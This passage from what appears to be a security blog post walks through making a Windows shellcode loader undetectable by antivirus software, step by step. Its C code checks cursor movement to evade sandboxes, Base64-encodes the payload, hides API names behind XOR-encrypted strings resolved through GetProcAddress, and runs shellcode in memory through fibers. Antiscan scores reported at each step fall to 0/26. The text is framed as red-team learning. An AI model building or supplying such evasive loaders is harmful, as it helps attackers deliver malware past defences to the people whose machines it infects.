<p>Okay, so this did not help much with the detection rates, rather it increased the detection rate. However, we will give it the benefit of doubt and assume that there are some false positives. Another possible explanation might be the fact that some AV engines are flagging the signature for the function. Nevertheless, we keep it in our program and try to optimize it in the future.</p>
<p><a href="https://antiscan.me/scan/new/result?id=qG7jq02xPNF9"><strong>Antiscan Score: 11/26</strong></a></p>
<p><img src="/blogs/images/study-in-obfuscation/level2.png" alt="Level2 Analysis"></p>
<h2 id="level-3---where-is-the-cursor">Level 3 - Where is the cursor?</h2>
<p>Again, instead of tampering with the shellcode itself, we are employing some more sandbox detection techniques. This time, we are monitoring for User Input, which in this case, is the cursor movement as such:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">int</span> <span style="color:#a6e22e">__check_cursor_activity</span>(){
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">int</span> __infinity_loop <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>    POINT p1, p2;
</span></span><span style="display:flex;"><span>    BOOL res1, res2;
</span></span><span style="display:flex;"><span>    HDESK desktop_handle;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Switch to input desktop if different from current one
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    desktop_handle <span style="color:#f92672">=</span> <span style="color:#a6e22e">OpenInputDesktop</span>(<span style="color:#ae81ff">0</span>, TRUE, GENERIC_READ);
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">SetThreadDesktop</span>(desktop_handle);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// The GetCurorPos() can fail at times so just retry it 5 times and 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#75715e">// if it still fails, then exit out with an error code
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">while</span>(<span style="color:#ae81ff">1</span>){
</span></span><span style="display:flex;"><span>        res1 <span style="color:#f92672">=</span> <span style="color:#a6e22e">GetCursorPos</span>(<span style="color:#f92672">&amp;</span>p1);
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (res1) <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">Sleep</span>(INTERVAL);
</span></span><span style="display:flex;"><span>        __infinity_loop <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (__infinity_loop <span style="color:#f92672">==</span> <span style="color:#ae81ff">5</span>) <span style="color:#66d9ef">return</span> FALSE;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    __infinity_loop <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">Sleep</span>(INTERVAL<span style="color:#f92672">*</span><span style="color:#ae81ff">10</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span>(<span style="color:#ae81ff">1</span>){
</span></span><span style="display:flex;"><span>        res2 <span style="color:#f92672">=</span> <span style="color:#a6e22e">GetCursorPos</span>(<span style="color:#f92672">&amp;</span>p2);
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (res2) <span style="color:#66d9ef">break</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">Sleep</span>(INTERVAL);
</span></span><span style="display:flex;"><span>        __infinity_loop <span style="color:#f92672">+=</span> <span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (__infinity_loop <span style="color:#f92672">==</span> <span style="color:#ae81ff">5</span>) <span style="color:#66d9ef">return</span> FALSE;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (res1 <span style="color:#f92672">&amp;&amp;</span> res2){
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (p1.x<span style="color:#f92672">==</span>p2.x <span style="color:#f92672">||</span> p1.y <span style="color:#f92672">==</span> p2.y <span style="color:#f92672">||</span> ((p1.x<span style="color:#f92672">-</span>p2.x)<span style="color:#f92672">==</span>(p1.y<span style="color:#f92672">-</span>p2.y))){
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">return</span> FALSE;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">else</span> {
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">return</span> TRUE;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">else</span>{
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> FALSE;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>We are keeping a track of the Cursor position. If the cursor doesn&rsquo;t move for a while then we exit out of the program without running any of that suspicious shell code.</p>
<h3 id="antiscan-analysis-3">Antiscan Analysis</h3>
<p>This seemed to have drastically bring down the detection scores. Thats&rsquo;s a huge improvement considering the barely tampered with payload.</p>
<p><a href="https://antiscan.me/scan/new/result?id=iyKaH5ChMD18"><strong>Antiscan Score: 8/26</strong></a></p>
<p><img src="/blogs/images/study-in-obfuscation/level3.png" alt="Level3 Analysis"></p>
<h2 id="level-4---going-bases">Level 4 - Going Bases</h2>
<p>Next up, we try to encode our payload using the good ol&rsquo; <strong>Base64</strong> encoding technique to mask our payload a tad bit more. We generate the Base64 encoded payload using <code>Obfuscator.level2()</code> which does everything upto <code>Obfuscator.level1()</code> plus base64 encodes the whole thing. This is just one step out many more which we can employ to add an extra layer of obfuscation to our payload</p>
<h3 id="antiscan-analysis-4">Antiscan Analysis</h3>
<p>This doesn&rsquo;t really have such an adverse effect on the detection rates. However, any obfuscation is a plus in the end.</p>
<p><a href="https://antiscan.me/scan/new/result?id=YkOZYbkCWBnr"><strong>Antiscan Score: 6/26</strong></a></p>
<p><img src="/blogs/images/study-in-obfuscation/level4.png" alt="Level4 Analysis"></p>
<h2 id="level-5---where-did-the-functions-go">Level 5 - Where did the functions go?</h2>
<p>One of the methods AV engines flag malicious programs is by looking at the various functions they call at runtime as well as by using methods like <code>string</code> analysis. So what if we could just do away with that? We achieve this using two methods:</p>
<ul>
<li>By replacing our easy-to-read function names with more sinister(i.e, random) ones. The <code>translate.txt</code> file corelates the original functions with the translated ones</li>
<li>As for native windows functions, instead of directly calling them, we first obtain the handle to the corresponding system DLL and use the <code>GetProcAddress()</code> function to retrieve the address of the corresponding function. To add to the obfuscation, we also XOR the string arguments passed to the function so as to not leave any trace behind. For example, we obfuscate <code>VirtualAlloc()</code> as such:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">/// In definitions.h
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">// The function signature
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#a6e22e">LPVOID</span> (WINAPI <span style="color:#f92672">*</span> _VirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Typedef
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">typedef</span> <span style="color:#a6e22e">LPVOID</span> (<span style="color:#66d9ef">__stdcall</span> <span style="color:#f92672">*</span> __type_virtualalloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span><span style="color:#75715e">// XOR Encrypted function name
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span> __virtualalloc[] <span style="color:#f92672">=</span> {<span style="color:#ae81ff">0x17</span>, <span style="color:#ae81ff">0x2b</span>, <span style="color:#ae81ff">0x31</span>, <span style="color:#ae81ff">0x30</span>, <span style="color:#ae81ff">0x30</span>, <span style="color:#ae81ff">0x27</span>, <span style="color:#ae81ff">0x2b</span>, <span style="color:#ae81ff">0x09</span>, <span style="color:#ae81ff">0x25</span>, <span style="color:#ae81ff">0x26</span>, <span style="color:#ae81ff">0x24</span>, <span style="color:#ae81ff">0x2f</span>, <span style="color:#ae81ff">0x00</span> };
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span>....
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">/// In obfuscators.h
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">// Decrypting XOR&#39;d function name
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#a6e22e">boUpJkYnxh29</span>(__virtualalloc);
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Getting handle to the function and appropriately typecasting it
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>_VirtualAlloc <span style="color:#f92672">=</span> (__type_virtualalloc)<span style="color:#a6e22e">GetProcAddress</span>(_kernel32, (LPCSTR)__virtualalloc);
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Manage Error
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">if</span> (_VirtualAlloc <span style="color:#f92672">==</span> NULL){
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// fprintf(stderr, &#34;Could not find VirtualAlloc in kernel32.dll\n&#34;);
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">10</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">/// In implant.cpp
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">// Allocate a memory buffer for payload using new function
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>exec_mem <span style="color:#f92672">=</span> <span style="color:#a6e22e">_VirtualAlloc</span>(<span style="color:#ae81ff">0</span>, decoded_data_len, MEM_COMMIT <span style="color:#f92672">|</span> MEM_RESERVE, PAGE_READWRITE);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (exec_mem <span style="color:#f92672">==</span> NULL){
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// fprintf(stderr, &#34;VirtualAlloc Failed with error code: %d\n&#34;, GetLastError());
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Once compiled, we can run <code>strings</code> from SysInternals to actually examine the resulting binary and notice that all the system function names previously being reflected in the output of the command are now gone.</p>
<h3 id="antiscan-analysis-5">Antiscan Analysis</h3>
<p>Adopting this, the analysis seems to be further lowered, bringing us even closer to zero detection</p>
<p><a href="https://antiscan.me/scan/new/result?id=M2xQpE6PZckd"><strong>Antiscan Score: 1/26</strong></a></p>
<p><img src="/blogs/images/study-in-obfuscation/level5.png" alt="Level5 Analysis"></p>
<h2 id="level-6---get-your-fibers-in">Level 6 - Get your Fibers in!</h2>
<p>Finally, we try alternative methods to execute shell code using <a href="https://docs.microsoft.com/en-us/windows/win32/procthread/fibers">Fibers</a>, which is the minimal execution unit of a modern operating system. We convert the main thread running the program into a <code>Fiber</code> amd then create a new one from it and switch to the context of the newly created Fiber, much like what we used to do with threads.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">/// In `implant.cpp`
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>....
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Convert main Thread to fiber
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>th <span style="color:#f92672">=</span> <span style="color:#a6e22e">_ConvertThreadToFiber</span>(NULL);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span>(th <span style="color:#f92672">==</span> NULL){
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// fprintf(stderr, &#34;ConvertThreadToFiber failed!\n&#34;);
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">3</span>;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span>fiber <span style="color:#f92672">=</span> <span style="color:#a6e22e">_CreateFiber</span>(<span style="color:#ae81ff">0</span>, (LPFIBER_START_ROUTINE)exec_mem, NULL);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (fiber <span style="color:#f92672">==</span> NULL){
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// fprintf(stderr, &#34;CreateFiber Failed with error code: %d\n&#34;, GetLastError());
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">4</span>;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">_SwitchToFiber</span>(fiber);
</span></span><span style="display:flex;"><span>....
</span></span><span style="display:flex;"><span>....
</span></span></code></pre></div><p>Compiling with the usual intructions gives us our final executable.</p>
<h3 id="antiscan-analysis-6">Antiscan Analysis</h3>
<p>This seems to do wonders as it brings the detection rates to zero(atleast at the time of writing this) and I guess we can say that we now have an undetectable sus-looking-program running our shellcode.</p>
<p><a href="https://antiscan.me/scan/new/result?id=QEqWv42rdLiY"><strong>Antiscan Score: 0/26</strong></a></p>
<p><img src="/blogs/images/study-in-obfuscation/level6.png" alt="Level6 Analysis"></p>
<h1 id="a-closing-word">A closing word</h1>
<p>This blog series was heavily inspired by the <a href="https://institute.sektor7.net/view/courses/red-team-operator-malware-development-essentials/">Sektor 7&rsquo;s RED TEAM Operator: Malware Development Essentials Course</a> and was an amazing learning curve for me, who used to be shit scared of WinAPI and all that black magic. Yes, I did do my own research and built upon it, but I really, really recommend going through the Course if you want to get over the fear of WinAPI  like me :D</p>

  <hr>
<div class="footer">
    
	    
            
	            <a class="previous-post" href="https://whokilleddb.github.io/blogs/posts/dlink_dir-819_lfi_and_dos/?ref=footer">« CVE-2022-38258: DLink DIR 819 LFI And DoS</a>
	        
        
	    
            
	            <a class="next-post" href="https://whokilleddb.github.io/blogs/posts/thm_agentt/?ref=footer">TryHackMe: Agentt »</a>
	        
        
    
</div>

  <div class="article-toc " >
    <h4></h4>
    <nav id="TableOfContents">
  <ul>
    <li><a href="#environment-setup">Environment Setup</a></li>
    <li><a href="#level-0---the-raw-shell-code">Level 0 - The Raw Shell Code</a>
      <ul>
        <li><a href="#antiscan-analysis">Antiscan Analysis</a></li>
      </ul>
    </li>
    <li><a href="#level-1---xor-it">Level 1 - XOR it!</a>
      <ul>
        <li><a href="#antiscan-analysis-1">Antiscan Analysis</a></li>
      </ul>
    </li>
    <li><a href="#level-2---sleep-patching-sandbox">Level 2 - Sleep Patching Sandbox</a>
      <ul>
        <li><a href="#antiscan-analysis-2">Antiscan Analysis</a></li>
      </ul>
    </li>
    <li><a href="#level-3---where-is-the-cursor">Level 3 - Where is the cursor?</a>
      <ul>
        <li><a href="#antiscan-analysis-3">Antiscan Analysis</a></li>
      </ul>
    </li>
    <li><a href="#level-4---going-bases">Level 4 - Going Bases</a>
      <ul>
        <li><a href="#antiscan-analysis-4">Antiscan Analysis</a></li>
      </ul>
    </li>
    <li><a href="#level-5---where-did-the-functions-go">Level 5 - Where did the functions go?</a>
      <ul>
        <li><a href="#antiscan-analysis-5">Antiscan Analysis</a></li>
      </ul>
    </li>
    <li><a href="#level-6---get-your-fibers-in">Level 6 - Get your Fibers in!</a>
      <ul>
        <li><a href="#antiscan-analysis-6">Antiscan Analysis</a></li>
      </ul>
    </li>
  </ul>
</nav>
</div>

</div>
        </main>
    </body>
</html>
